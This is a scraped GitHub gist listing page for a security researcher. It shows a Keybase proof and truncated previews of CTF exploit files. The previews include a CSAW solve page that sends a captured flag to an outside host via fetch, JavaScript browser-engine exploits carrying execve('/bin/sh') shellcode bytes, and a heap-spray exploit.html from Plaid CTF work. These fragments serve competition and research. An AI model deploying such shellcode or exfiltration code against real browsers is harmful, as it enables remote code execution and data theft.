Keybase proof
I hereby claim:
- I am itszn on github.
- I am itszn (https://keybase.io/itszn) on keybase.
- I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo
To claim this, I am signing this object:
View solve1.html
| <iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe> | |
| <script> | |
| let i=0; | |
| window.addEventListener("message", function(event) { | |
| msg = event.data; | |
| console.log("attacker got ",msg); | |
| if (msg.id == 0) { | |
| a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*'); | |
| } else if (msg.id == 1) { | |
| fetch("http://itszn.com/?flag="+msg.output); |
View exploit.js
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
View jquery-latest.js
| /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */ | |
| !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e, |
View exploit.js
| // Load Int library, thanks saelo! | |
| load('util.js'); | |
| load('int64.js'); | |
| // Helpers to convert from float to in a few random places | |
| var conva = new ArrayBuffer(8); | |
| var convf = new Float64Array(conva); | |
| var convi = new Uint32Array(conva); | |
| var convi8 = new Uint8Array(conva); |
View d8.js
| /* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
| /* ### Utils, thanks saelo ### */ | |
| // | |
| // Tiny module that provides big (64bit) integers. | |
| // | |
| // Copyright (c) 2016 Samuel Groß | |
| // |
itszn
/ gist:0eaac8657401d08f3b9d25ffc87875d7
Created Feb 26, 2018
View gist:0eaac8657401d08f3b9d25ffc87875d7
| 301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9 |
View exploit.html
| <script> | |
| function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
| var sc = []; | |
| for (var i=0; i<0x480; i++) { | |
| sc.push(0x90); | |
| } | |
| //sc.push(0xcc); | |
| //sc.push(0xeb); | |
| //sc.push(0xfe); |
View subleq.py
| from binaryninja import (Architecture, RegisterInfo, InstructionInfo, | |
| InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext, | |
| BranchType, | |
| LowLevelILOperation, LLIL_TEMP, | |
| LowLevelILLabel, | |
| FlagRole, | |
| LowLevelILFlagCondition, | |
| log_error, | |
| CallingConvention, | |
| interaction, |
View keybase.md
NewerOlder